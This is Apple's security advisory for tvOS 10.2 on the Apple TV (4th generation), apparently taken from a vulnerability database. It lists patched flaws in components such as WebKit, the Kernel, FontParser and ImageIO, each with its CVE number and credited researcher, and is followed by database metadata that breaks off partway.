## About Apple security updates
For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.
For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).
Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.

## tvOS 10.2
Released March 27, 2017
**Audio**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2430: an anonymous researcher working with Trend Micro’s Zero Day Initiative
CVE-2017-2462: an anonymous researcher working with Trend Micro’s Zero Day Initiative
**Carbon**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution
Description: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.
CVE-2017-2379: John Villamil, Doyensec, riusksk (泉哥) of Tencent Security Platform Department
**CoreGraphics**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted image may lead to a denial of service
Description: An infinite recursion was addressed through improved state management.
CVE-2017-2417: riusksk (泉哥) of Tencent Security Platform Department
**CoreGraphics**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved input validation.
CVE-2017-2444: Mei Wang of 360 GearTeam
**CoreText**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted font file may lead to arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2435: John Villamil, Doyensec
**CoreText**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted font may result in the disclosure of process memory
Description: An out-of-bounds read was addressed through improved input validation.
CVE-2017-2450: John Villamil, Doyensec
**CoreText**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted text message may lead to application denial of service
Description: A resource exhaustion issue was addressed through improved input validation.
CVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI
**FontParser**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted font file may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved input validation.
CVE-2017-2487: riusksk (泉哥) of Tencent Security Platform Department
CVE-2017-2406: riusksk (泉哥) of Tencent Security Platform Department
**FontParser**
Available for: Apple TV (4th generation)
Impact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved input validation.
CVE-2017-2407: riusksk (泉哥) of Tencent Security Platform Department
**FontParser**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted font may result in the disclosure of process memory
Description: An out-of-bounds read was addressed through improved input validation.
CVE-2017-2439: John Villamil, Doyensec
**HTTPProtocol**
Available for: Apple TV (4th generation)
Impact: A malicious HTTP/2 server may be able to cause undefined behavior
Description: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.
CVE-2017-2428
Entry updated March 28, 2017
**ImageIO**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted image may lead to arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2416: Qidan He (何淇丹, @flanker_hqd) of KeenLab, Tencent
**ImageIO**
Available for: Apple TV (4th generation)
Impact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative
**ImageIO**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2467
**ImageIO**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted image may lead to unexpected application termination
Description: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.
CVE-2016-3619
**JavaScriptCore**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A use after free issue was addressed through improved memory management.
CVE-2017-2491: Apple
Entry added May 2, 2017
**JavaScriptCore**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted web page may lead to universal cross site scripting
Description: A prototype issue was addressed through improved logic.
CVE-2017-2492: lokihardt of Google Project Zero
Entry updated April 24, 2017
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: An integer overflow was addressed through improved input validation.
CVE-2017-2440: an anonymous researcher
**Kernel**
Available for: Apple TV (4th generation)
Impact: A malicious application may be able to execute arbitrary code with root privileges
Description: A race condition was addressed through improved memory handling.
CVE-2017-2456: lokihardt of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A use after free issue was addressed through improved memory management.
CVE-2017-2472: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: A malicious application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed through improved input validation.
CVE-2017-2473: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: An off-by-one issue was addressed through improved bounds checking.
CVE-2017-2474: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A race condition was addressed through improved locking.
CVE-2017-2478: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A buffer overflow issue was addressed through improved memory handling.
CVE-2017-2482: Ian Beer of Google Project Zero
CVE-2017-2483: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with elevated privileges
Description: A memory corruption issue was addressed through improved memory handling.
CVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)
Entry added March 31, 2017
**Keyboards**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code
Description: A buffer overflow was addressed through improved bounds checking.
CVE-2017-2458: Shashank (@cyberboyIndia)
**Keychain**
Available for: Apple TV (4th generation)
Impact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.
Description: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.
CVE-2017-2448: Alex Radocea of Longterm Security, Inc.
Entry updated March 30, 2017
**libarchive**
Available for: Apple TV (4th generation)
Impact: A local attacker may be able to change file system permissions on arbitrary directories
Description: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.
CVE-2017-2390: Omer Medan of enSilo Ltd
**libc++abi**
Available for: Apple TV (4th generation)
Impact: Demangling a malicious C++ application may lead to arbitrary code execution
Description: A use after free issue was addressed through improved memory management.
CVE-2017-2441
**libxslt**
Available for: Apple TV (4th generation)
Impact: Multiple vulnerabilities in libxslt
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-5029: Holger Fuhrmannek
Entry added March 28, 2017
**Security**
Available for: Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with root privileges
Description: A buffer overflow was addressed through improved bounds checking.
CVE-2017-2451: Alex Radocea of Longterm Security, Inc.
**Security**
Available for: Apple TV (4th generation)
Impact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution
Description: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.
CVE-2017-2485: Aleksandar Nikolic of Cisco Talos
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may exfiltrate data cross-origin
Description: A prototype access issue was addressed through improved exception handling.
CVE-2017-2386: André Bargull
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved input validation.
CVE-2017-2394: Apple
CVE-2017-2396: Apple
CVE-2016-9642: Gustavo Grieco
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-2395: Apple
CVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative
CVE-2017-2455: Ivan Fratric of Google Project Zero
CVE-2017-2459: Ivan Fratric of Google Project Zero
CVE-2017-2460: Ivan Fratric of Google Project Zero
CVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon Shin
CVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab
CVE-2017-2466: Ivan Fratric of Google Project Zero
CVE-2017-2468: lokihardt of Google Project Zero
CVE-2017-2469: lokihardt of Google Project Zero
CVE-2017-2470: lokihardt of Google Project Zero
CVE-2017-2476: Ivan Fratric of Google Project Zero
CVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative
Entry updated June 20, 2017
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A type confusion issue was addressed through improved memory handling.
CVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to high memory consumption
Description: An uncontrolled resource consumption issue was addressed through improved regex processing.
CVE-2016-9643: Gustavo Grieco
**WebKit**
Available for: Apple TV (4th generation)
Impact: A malicious website may exfiltrate data cross-origin
Description: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.
CVE-2017-2367: lokihardt of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to universal cross site scripting
Description: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.
CVE-2017-2445: lokihardt of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.
CVE-2017-2446: Natalie Silvanovich of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Visiting a maliciously crafted website may compromise user information
Description: A memory corruption issue was addressed through improved memory handling.
CVE-2017-2447: Natalie Silvanovich of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative
Entry added March 28, 2017
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to universal cross site scripting
Description: A logic issue existed in frame handling. This issue was addressed through improved state management.
CVE-2017-2475: lokihardt of Google Project Zero
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may exfiltrate data cross-origin
Description: A validation issue existed in element handling. This issue was addressed through improved validation.
CVE-2017-2479: lokihardt of Google Project Zero
Entry added March 28, 2017
**WebKit**
Available for: Apple TV (4th generation)
Impact: Processing maliciously crafted web content may exfiltrate data cross-origin
Description: A validation issue existed in element handling. This issue was addressed through improved validation.
CVE-2017-2480: lokihardt of Google Project Zero
CVE-2017-2493: lokihardt of Google Project Zero
Entry updated April 24, 2017

## Additional recognition
**XNU**
We would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.
{"id": "APPLE:HT207601", "bulletinFamily": "software", "title": "About the security content of tvOS 10.2 - Apple Support", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "published": "2017-06-20T10:43:59", "modified": "2017-06-20T10:43:59", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://support.apple.com/kb/HT207601", "reporter": "Apple", "references": [], "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2479", "CVE-2017-2461", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2492", "CVE-2017-2395", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2491", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "type": "apple", "lastseen": "2020-12-24T20:42:40", "edition": 3, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "apple", "idList": ["APPLE:198F1AB81F91F2CEB090B4B4D49C57AD", "APPLE:20D403FA17FFAFBF6C005DAD59ACB4F6", "APPLE:218B65DBD8E421B171C5CC7639BE893D", "APPLE:4D5D6CE943DE7279F91D23CD74879D4C", "APPLE:581D1ADF40E75038A35B5C18CE7EDD03", "APPLE:C3300089BE0D932332C0D20113B0C302", "APPLE:E8FF9F04ED54DD8E8D5B899FB4A8000E", "APPLE:HT207599", "APPLE:HT207600", "APPLE:HT207602", "APPLE:HT207607", "APPLE:HT207615", "APPLE:HT207617"]}, {"type": "archlinux", "idList": ["ASA-201611-26", "ASA-201611-27", "ASA-201703-4", "ASA-201703-5", "ASA-201704-9"]}, {"type": "attackerkb", "idList": ["AKB:857FC1A3-EE6C-45DE-93A8-A4D31D5ED28F"]}, {"type": "avleonov", "idList": ["AVLEONOV:B5CA8049524C96A911991EE8ADF24F64"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0402"]}, {"type": "chrome", "idList": ["GCSA-7294356344306922687"]}, {"type": "cve", "idList": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029"]}, {"type": "debian", "idList": ["DEBIAN:DLA-693-1:042FB", "DEBIAN:DLA-866-1:4F92E", "DEBIAN:DSA-3810-1:3BFFF", 